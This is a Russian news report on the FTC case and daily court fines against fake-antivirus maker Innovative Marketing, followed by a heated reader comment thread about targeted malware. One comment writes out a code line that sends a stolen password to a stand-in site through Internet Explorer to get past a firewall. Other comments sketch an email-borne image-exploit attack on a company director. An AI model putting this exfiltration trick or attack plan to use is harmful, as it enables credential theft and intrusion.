Создателя фальшивых антивирусов будут ежедневно штрафовать за неповиновение суду

image

Теги: антивирус, суд, штраф, FTC, новость

Innovative Marketing удалось ввести в заблуждение более миллиона человек, вытянув из них деньги. Штраф за просрочку исполнения приговора был наложен после того, как Сэм Джейн, руководитель компании, а также четверо других ответчиков не явились на заседание суда.

Федеральный суд вынес очередной вердикт в отношении компании Innovative Marketing, занимающейся изготовлением и продажей фальшивых антивирусов. Судья Ричард Беннетт объявил, что зарегистрированная в Белизе контора обязана будет выплачивать по 8 тысяч долларов за каждый день неповиновения предыдущему вердикту.

Предыдущий вердикт заключается в том, что Innovative Marketing обязана прекратить распространение лже-антивирусов. Запрета удалось добиться Федеральной торговой комиссии США - на основании доказательств, представленных комиссией, суд наложил временный запрет, согласно которому ответчики (помимо Innovative Marketing, в деле фигурировала также компания ByteHosting Internet Services) должны прекратить выдавать себя за специалистов в области компьютерной безопасности. Также регистраторам доменов и хостерам соответствующих сайтов, использовавшихся для обманных целей, предписано принять необходимые меры по недопущению пользователей на такие сайты.

По имеющимся данным, Innovative Marketing удалось ввести в заблуждение более миллиона человек, вытянув из них деньги. Штраф за просрочку исполнения приговора был наложен после того, как Сэм Джейн, руководитель компании, а также четверо других ответчиков не явились на заседание суда.

Стоит отметить, что решение суда о приостановлении деятельности Innovative Marketing - временное, однако FTC собирается довести дело до полного запрета. Кроме того, в комиссии рассчитывают на то, что суд обяжет ответчиков вернуть обманутым интернет-пользователям все деньги, отобранные нечестным путем.


или введите имя

CAPTCHA
Страницы: 1  2  
uyga
29-12-2008 10:38:23
Как определяют что антивирус фальшивый? Каковы критерии? Он не ловит вырусы? Так новых модификаций не ловит никто. Все антивирусы фальшивые? А если антивирус ругается только на 1 стандартный тест, он фальшивый?
0 |
29-12-2008 10:49:12
Так новых модификаций не ловит никто.Пеши есчо. Как определяют что антивирус фальшивый?Можно очевидно установить, что антивирус вместо проверки файлов просто показывает полоску и имитирует активность. А если "антивирус" сам заражает систему, то тогда точно фальшивый
0 |
BadXxX
29-12-2008 11:40:47
Так новых модификаций не ловит никто.Пеши есчо.Вот это Вы зря, уважаемый. Большинство из современных вирусов пишется студентами-практикантами, потому они ловятся антивирусниками и фаерволлами легко, пусть и не всеми. Но вот профессиональные вирусы ака трояны ака руткиты, написаннные с целью промышленного шпионажа в крупных масштабах или же просто для построения мирового ботнета - это совсем другое дело. Такие "игрушки" могут писаться не один месяц, а попадают на компьютер в виде очедной картинки (0-day), которую даже не нужно открывать. Винда сама откроет в режиме эскизового просмотра. И сразу пробивается до ring-0. А тут уж - повелитель системы не юзер, а трой. С ring-0, если покопать прошивальщик биоса можно узнать даже куда коннектиться, чтобы модифицировать его. Антивири и фаеры уже никогда не узнают, что на этой машине вообще что-то есть. Про криптование вообще рассказывать не буду. Статические сигнатуры здесь бесполезны. При грамотном подходе и эвристика не поможет. Как определяют что антивирус фальшивый?
0 |
BadXxX
29-12-2008 11:43:43
Как определяют что антивирус фальшивый?Письменные характеристики не совпадают с реальными. (количество сигнатур, наличие эвристики и многое многое другое)
0 |
dr.Zlo
29-12-2008 13:09:16
Такие "игрушки" могут писаться не один месяц, а попадают на компьютер в виде очедной картинки (0-day), которую даже не нужно открывать. Винда сама откроет в режиме эскизового просмотра. И сразу пробивается до ring-0.Ололо! Ксакепа перечитался?
0 |
BadXxX
29-12-2008 13:22:51
Ололо! Ксакепа перечитался? Товарищ малолетний тролль, покинь сей сайт и иди на двач. С подобными игрушками, причем 0-day, знаком совсем не по наслышке. И, да будет тебе известно, это реализуется элементарно двумя переполнениями буффера, если уж так тебе интересно. Первый компрометирует рабочее пространство картинки, второй - драйвер (чисто для примера). Это всё кажется не реальным ровно до тех пор, пока не начнешь работать в серьезной конторе, чья информация интересует третьих лиц. Был как-то один интересный случай, один знакомый писал под заказ за крупную сумму червя на подобии CIH (он же "Чернобыль"), целью которого была одна крупная фирма. Конечно, тебе троллю, совершенно не связанному с отраслью IT даже представить сложно, как вообще подобные деструктивные действия возможны.
0 |
muxоmor
29-12-2008 15:49:22
и что написал (знакомый твой) ? заразил ? lol ты понимаешь что все учесть невозможно? и подумай, ОС ежедневно обновляется, антивирус тоже, в фаервол настроен грамотно, трафик фильтруется на шлюзе никсовой машиной и т.п и как представлю что твой друг пол года реверсит фаервол, потом пол года пишет трояна, еще пол года ломает шлюзовый сервер чтобы отследить наибольшую активность "компании х", потом пол года ломает сервер, на котором находится ресурс, где прослеживается наибольшая активность, потом внедряет туда своего трояна, и облом, "компания х" сменила ОС платформу (XP->Vista Windows - *nix) и твой друг крепко обламывается, выкидывает комп из окна и уходит в монастырь !!! плакать хочется )))) Хватит пороть чушь про супермегоцелевые вирусы ring-0 на заказ, лохотрон все это, проще нанять за эти же деньги инсайдера, который все что нужно на флешке притащит, а вирусы, трояны и т.п это лотерея, удел создателей ботнетов, студентов шизофреников и хакеров приколистов, прошло то время, когда программы мерялись килобайтами и были сплошь дырявыми... и учи матчасть , не применяй термин 0-day если не знаешь что это такое, и какое к черту двойное переполнение буфера, сам то пробывал
0 |
Ну и?
29-12-2008 15:54:29
Не осилили тему и поэтому решили в нее не верит?
0 |
muxomor
29-12-2008 16:36:51
вы и в бога наверно тоже верите ? тему то я осилил, только выводы свои сделал, в отличии от вас, и пока в этих своих выводах не шошибся... я не отрицаю, есть профессиональные, очень интересные вирусы, трояны etc. но предназначены они не для влома отдельной "компании Х" а для массового "лотерейного" заражения и пишутся не одним студентом шизофреником на VB, а командами профессионалов на заказ, и стоит такой заказ поверте поболее чем "инсайдер с флешкой"
0 |
BadXxX
29-12-2008 16:20:08
Ещё один малолетний тролль. С вами бесполезно говорить о таких вещах, когда срач - это основное что вами движет. Да, он угробил свой современный комп тогда, случайно запустив его. После этого он скупал у всех дешевое б/у железо и на них тестировал. Как в действии он работал - я не в курсе, знаю только что половину работы ему оплатили уже через 2 недели. "ОС ежедневно обновляется, антивирус тоже, в фаервол настроен грамотно, трафик фильтруется на шлюзе никсовой машиной и т.п и как представлю что твой друг пол года реверсит фаервол"Не выдумывай. Во-первых, это был колоссально деструктивный червь, а не троян. Насчет антивируса - ты хоть принципы его работы знаешь? Есть такое понятие как "сигнатуры", в которых он не числится. Раз уж про остальную выдуманную тобой чушь разговор пошел - идём далее. Какой реверсинг фаера? какие пол года? Элементарный обход фаерволла: winexec('iexplore.exe http://coolhacker.com/index.php?pass='+pass,0); Но ты в этом ничего не понимаешь, потому обьясню. Конечно же, интернет эксплорер + 80порт добавлен в доверенную зону. В результате - пароли ушли на левый сайт. Раньше так пинч "баловался" и обходил все фаеры. А теперь расскажу тебе про Ring0. Это уровень, на котором ТЫ король системы. И с помощью прямого обращения к драйверу ты можешь обмануть и фаерволл и всё что угодно. А ещё можно сделать "несуществующими" реальные файлы на системе. Не правда ли, круто? Абсолютно всё обходить - невозможно, и не утверждал это. не применяй термин 0-day если не знаешь что это такое, и какое к черту двойное переполнение буфера, сам то пробывал один раз опечатался. Подразумевалось "не закрытая бага мс системе, о существовании которой они не знают", коих очень много. Много не в новостной ленте. А в приватном использовании. Двойное переполнение? Я не пробовал, я видел в живую как это происходит на одной из машин. И я лично выдирал такую дрянь из системы. Я лично ковырял этого троянца. и учи матчастьСмени мозги. А теперь, попрошу остальных товарищей троллей перестать усераться, если отсутствует реальная критика по делу, а не глупые высеры малолетнего студентика с манией величия, ака "кулхацкера". Очень надоело, когда жизненные ситуации, с которыми реально люди сталкиваются воспринимают чем-то не реальным лишь только из-за не знания и не опытности в данных вопросах. P.S.: Доказывать ничего никому не буду и не собираюсь. Вирусы не так опасны, пока они "массовое средство", написанное неграмотными студентами-практикантами (наподобии тех, что выше усераются), т.к. за вас всю грязную работенку сделают дяди из МС и лаборатории касперского.
0 |
этоттам
29-12-2008 20:03:57
Да, он угробил свой современный комп тогда, случайно запустив его. peace dish? "случайно угробил", ога, давай дальше сказки рассказывай. про Virtual PC и qemu твой друг не знал, да? Наверное, он ламер, раз так лажается? Как в действии он работал - я не в курсеС этого и надо было начинать. Друг наплел с три короба, а ты купился. А теперь расскажу тебе про Ring0. Это уровень, на котором ТЫ король системы. И с помощью прямого обращения к драйверу ты можешь обмануть и фаерволл и всё что угодно. Угу, щаз. Даст тебе ядерный антивирус обмануть себя. Птичка наивняк. Дальше - забудь "про короля системы" на уровне 0. Антивирус, реализованный в гипервизоре, + виртуальная машина с откатываемым системным диском и подключаемыми пользовательскими - и сосет любой вирус до перезагрузки. Даже если она не защищена. Валяй, пиши вирус-гипервизор. А потом попробуй запустить его из кольца 3 в присутствии толкового антивируса, который бихевиорально ловит эксплоиты срыва стека, да еще с включенным аппаратным DEP, который появился еще до аппаратной виртуализации. В общем, бред сивой кобылы в лунную ночь. Ни одна овчинка такой рисковой выделки не стоит.
0 |
BadXxX
30-12-2008 00:20:29
Virtual PC и qemu твой друг не знал, да? Наверное, он ламер, раз так лажается? Был бы в теме, знал бы что значит "положить болт" или "не придать значения". С этого и надо было начинать. Друг наплел с три короба, а ты купился. Знакомый. Занял 1ое место по области и 8ое место по России. Сейчас работает в одной крупной фирме, которая пожалуй не известна разве что только чайникам, по весомым причинам не буду называть её. Только такой недоспециалист-студентик как ты будет врать о подобных вещах, но не он. Ах да, ты же веришь что я такой же лгун и тролль как и ты и не поверишь в это, забыл. Валяй, пиши вирус-гипервизор. А потом попробуй запустить его из кольца 3 в присутствии толкового антивируса, который бихевиорально ловит эксплоиты срыва стека, да еще с включенным аппаратным DEP, который появился еще до аппаратной виртуализации.Сразу видно, человек не знает что такое "руткит" и принцип его работы.
0 |
этоттам
30-12-2008 06:35:51
Был бы в теме, знал бы что значит "положить болт" или "не придать значения". Я как раз в теме, и прекрасно знаю, чтобы потом не бицца башкой апстену, обкатка делается на виртуалках, и порой - даже разработка. Именно для того, чтобы базовую систему даже случайно не грохнуть. Это, милый мальчик, называется профессиональный подход к разработке и тестированию. Занял 1ое место по области и 8ое место по России. пруфлинк или не было. Сейчас работает в одной крупной фирме, которая пожалуй не известна разве что только чайникам, "Чайник" 15 лет кодит и многие фирмы помнит наизусть. Но телепаты в отпуске. Ссылочку на фирму. Только такой недоспециалист-студентик как ты Ипатьево! Ужос, меня раскусили! Сессия ... Чорт, какая сессия, девятый год не учусь уже. по весомым причинам не буду называть её.так я и говорю - ты за свои слова мало того, что не отвечаешь - аргументов 0 ... Сразу видно, человек не знает что такое "руткит" и принцип его работы. ... так еще и в матчасти - ни уха ни рыла. заодно как и в людях. Я могу на память тебе сказать какие вызовы минимум должен руткит перехватывать, что такое DKOM, и как снимаются обработчики NDIS в цепочке. Включенный DEP не даст эксплоиту сорвать стек - краш приложения и все. Включенная виртуализация не даст тебе эффективно эксплуатировать машину. Короче, дорогой, не позорься. Либо потрудись обосновать свою сказку. Вирусописательство нынче вещь не очень хорошо оплачиваемая, больше можно на SAP и 1С заработать.
0 |
BadXxX
30-12-2008 11:14:37
Пля, хоть кто-то написал по делу и со смыслом
0 |
BadXxX
30-12-2008 11:38:52
Спасибо. Нашёл ещё миллион способов насрать в этой теме. Ты настоящий тролль! Учитывая, что на каждое одно моё сообщение находится 3 высера троллей, я вынужден прекратить эту дискуссию ввиду отсутствия какого-либо логического смысла. И напомню всем присутствующим здесь троллям: Я просто поправил товарища "нонейм" 29.12.2008 10:49:12 о заблуждении в том, что новые вирусы точно также прекрасно обнаруживаются как и старые, по тем же сигнатурам. А теперь задумайтесь, в какую сторону вы ушли и какой бред вы пишете, совершенно не относящийся к данной тематике, параллельно впихивая фразы "нуб", "тупой", "ничего не знает" и т.п., для развязывания срача. Я уже даже не пишу по делу и тематике, как вы сами выдумываете почву для спора и продолжаете срать. И попытайтесь сказать, что это не так. А главное, найдите теперь веские аргументы для того, чтобы доказать обратное, когда целая страница срача перед вашими глазами и глазами людей. На этом я считаю этот быдло-срач оконченым, а весь бред, который вы здесь будете писать - буду просто игнорировать, понимая что цель этого всего - только лишь срач.
0 |
sdv
29-12-2008 17:00:52
Ну почему-же. Итак, имеем директора фирмы Х, найти его e-mail - не проблема. С 99% вероятностью у него XP. Если к моменту повествования у него не закрыто, например, переполнение буфера, например в jpg, отправим ему соответствующую картинку в письме. Зуб даю откроет. Вот и все, а то шлюз, файр... Если антивирус знает об этой уязвимости, он проверит изображение, а может и не знать и так уже было. И оно загрузится. И запустится. Если не лентяйничать и написать "начинку" самому, то сигнатуры его в базе нет, и если пропустит, как правило хилая, эвристика, то оно даже сумеет закрепиться в системе. В любом случае оно получит доступ к файлам, к которым имеет доступ директор. И вряд-ли имеет доступ инсайдер. Обход файра на выход - традиционно более простая задача и данные уйдут. Естественно, вероятность этого сценария напрямую зависит от свежести информации об уязвимости. Но это вполне можно купить.
0 |
29-12-2008 18:06:40
а если так - ОС Vista, директор сидит под пользователем, админ следит за обновлениями, весь трафик идет через проксю, почта отправляется/принимается только на/с адресов имеющихся в адресной книге, которая в свою очередь внесена в проксю, с браузером тоже самое (только на разрешенные адреса)
0 |
sdv
29-12-2008 19:29:55
Гм... ответьте СЕБЕ на три вопроса: 1. Вы верите, что Vista принципиально не имеет уязвимостей? 2. Вы согласны, что существует и продается информация об уязвимостях ДО публикации и выхода официального исправления от вендора? 3. Что Вам дороже, Целостность ОС или приватная информация? Как Вы считаете, имеет ли директор, работающий под пользователем, право чтения на файлы документов? Прокси.... Вы Skype видели? Вот покажите на примере скайпа, как можно заблокировать выход в интернет приложению без тотальной рубки всего что шевелится. И первое, с чем Вы столкнетесь - это баланс между безопасностью и удобством работы. В общем все что я хочу донести, это две мысли (хоть это и выродилось в масло масляное): 1. Антивирус не панацея, особенно для корпораций, когда они не случайная жертва, а цель. Я уже писал почему. 2. Созданные под конкретную цель вирусы отличаются от массовых примитивных использованием свежих уязвимостей и отсутствием в базах антивирусов
0 |
sdv
29-12-2008 19:33:53
Дополнение к первому вопросу: возможно я Вас неправильно понял. Если Вы о трудности выбора версии ОС для атаки, то: 1. Это как раз можно легко выяснить у инсайдера или даже просто у компетентного работника между трепом. 2. Два письма?
0 |
BadXxX
30-12-2008 00:33:12
Молодец, хорошо знаешь теорию из книг 10-летней давности. А на практике такого не бывает. Директор попросил защитить тебя компьютер до жопы и ппц как урезать инет. До определённых адресов. Это по крайней мере не серьёзно. Остальное sdv написал, но - это уж если в твоей описанной не реальной ситуации. Всегда можно найти, как проникнуть в твою систему. Знаешь такую банальную "шутку"? Даже если ты защитишь программную начинку на 100% (что не реально. Даже на мейле находилась SQL Injection года 1,5 назад, как бы это поразительно не было), каждый комп отдельно ты в сейф 20мм не замуруешь.
0 |
BadXxX
30-12-2008 00:36:00
*это было написано нонейм автору (29.12.2008 18:06:40).
0 |
sdv
29-12-2008 16:45:52
Зря Вы так. Не знаю, насколько автор сам близок к "теме", может только по слухам знаком с предметной областью, но что есть - то есть. Антивирус далеко не панацея при серьезном подходе. Эвристика зачастую сильно хромает. У создателей антивируса выбор простой, или куча ложных срабатываний или пропущенные вирусы. Первое по репутации бьет сильнее. Вообще ИМХО современные антивирусы - это защита от уже известных массовых вещей. Если вирус создан под тебя, то от откровенного примитива спасают политики безопасности на запуск сторонней дряни. Если используется незакрытая уязвимость, то все. Еще одна проблема вируса, созданного под тебя - он долго не попадет в базы, т.к. будет запущен только тебе. Разве что ты его сам обнаружишь и отправишь на исследование. Да, сейчас большой наплыв недоучек и примитивных вирусов, ними написанных. Но кому нужно серьезно, тот помнит все, что было наработано еще под досом (крипто, полиморф, многоуровневый код и т.д.) плюс кучу нового. Скажем так, близко знакомый мне человек в свое время писал под заказ червя, задача которого была вывести из строя определенные машины в корпоративной сети. По цене вопроса было и исполнение - примитивное. Но антивирусы его не заметили, цель была выполнена.
0 |
sdv
29-12-2008 17:08:20
З.Ы. "многоуровневый код" - был такой смешной прием, когда JMP делался не на метку на границы инструкций, а в середину многобайтовой инструкции и после этого код интерпретировался по другому.
0 |
BadXxX
29-12-2008 23:50:49
Хоть один человек есть на секлабе, реально относящийся к отрасли IT (не примитивный эникейщик), поддерживаю. Остальной срач даже читать не стану, т.к. заведомо догадываюсь что там. Очередная глупая и неуместная критика студентов-практикантов с манией величия, а также просто подростков, перечитавших вышеописанный журнал "Хакер". Кто-то пытается спорить и доказывать то, что я пишу бред и ложь. А теперь представьте себе, малолетние недоспециалисты, что всё это целиком и полностью чистейшая правда, которую вы, личности, совсем далёкие от данной тематики, пытаетесь критиковать и лишь только показываете и доказываете мне и остальным дипломированным спецам с огромным опытом в IT, что вы очень глупы и не понимаете вообще о чём спорите, а также кто ВЫ на самом деле.
0 |
noob
30-12-2008 11:00:50
"мне и остальным дипломированным спецам с огромным опытом в IT" сколько раз еще напишешь про огромный опыт в IT и дипломы? смешно
0 |
123
02-01-2009 03:40:38
Дебилоид ... Троян,Руткит, и вирус это разные проги .....
0 |
29-12-2008 10:55:31
Как определяют что антивирус фальшивый? Каковы критерии? Он не ловит вырусы? Так новых модификаций не ловит никто. Все антивирусы фальшивые? А если антивирус ругается только на 1 стандартный тест, он фальшивый? - ДА
0 |
Vasia
29-12-2008 11:16:19
проснись дядя, этот бойан уже весь инет знает, и только у вас в мухосранске новости опаздывают...
0 |
29-12-2008 13:13:44
0_о это новости.. я думал, что даже в мухосранске знают, что не секлабе нет колонки новостей, она только так называться.
0 |
47647
29-12-2008 13:37:54
А также фальшивыми антивирусамиА также фальшивыми вирусами
0 |
29-12-2008 13:49:01
А также фальшивыми антивирусами А также фальшивыми вирусами А также фальшивыми антиантивирусами
0 |
()((()()()(
29-12-2008 13:52:14
Создателя фальшивых антивирусов будут ежедневно штрафовать за неповиновение судуармия пендостана будет бегать по всему миру, бомбить страны, откуда создатели анти-антивирусов?
0 |
Андрей
30-12-2008 11:31:04
Вообще люди, типо ИТ спецы, вы когда нормально будете как люди развиваться? У большинства из вас за каждым аргументом - агрессия и ненависть к оппоненту, а ведь именно он дает вам возможность развиться или узнать что-то новое. Проявляйте уважение - научились компьютерным технологиям, научитесь и культурному поведению, хотя бы даже здесь, в комментах. Кому нужна ваша агрессия? она вам-то самим нужна?
0 |
Dragon_X
30-12-2008 14:07:16
BadXxX развлекаешь народ?) этоттам, BadXxX спорили об одном и том же, просто ситуаций множество, каждая имеет право на существование
0 |
30-12-2008 14:08:45
этоттам, BadXxX пишите на почту/аську/личку - пообщаемся
0 |
Виктор
30-12-2008 15:10:38
Ребята, вы не о том общаетесь Более миллиона купивших "пустышку" хотя бы по 40 долларов - это 40 миллионов. Это бизнес, крутой и достаточно прибыльный. А еще на сколько мне известно, данные продукты занимаются показам рекламы, и конечно же не за бесплатно... Очень интересно было почитать комментарии специалистов и не очень компетентных пользователей (на которые искренне жаль времени). Но статья призывает скорее подумать еще об одной масштабной сфере бизнеса, а не о технических подробностях.
0 |
этоттам
30-12-2008 21:30:29
кто как, а я писатель честных программ. репутация, знаете ли, дороже.
0 |
How is fucking duty today?
15-03-2009 00:40:54
Хи, а я работал в этой компании не так давно =)
0 |
этоттам
30-12-2008 21:28:47
зочем?
0 |
этоттам
30-12-2008 21:31:36
тьфу, коммент не туда прилип. о чем пообщаемся-то? с какой целью?
0 |
Злой
31-12-2008 11:56:19
Поддельный антивирус - это антивирус, который в "бесплатной" версии говорит о том, что у вас в системе столько вирусов, что страшно даже комп врубать да и еще постоянно свою рекламу паказывает, а стоит дешево ))) А еще, после того как ты это счастье купишь, ничего не делает в системе, кроме того, что оно ходит за обновлениями на какой то сайт (вдруг нужно будет еще что то впарить пользователям) ну и в лучшем случае содержит какойто антималварный "недодвижок" так для отвода глаз. Основная задача таких "пустышек" продать себя пользователю. И как показывает практика - таких пользователей в мире оказалось ооочень много ))) Вот кому то это надоело... Столька бабла на этом делали.
0 |
Страницы: 1  2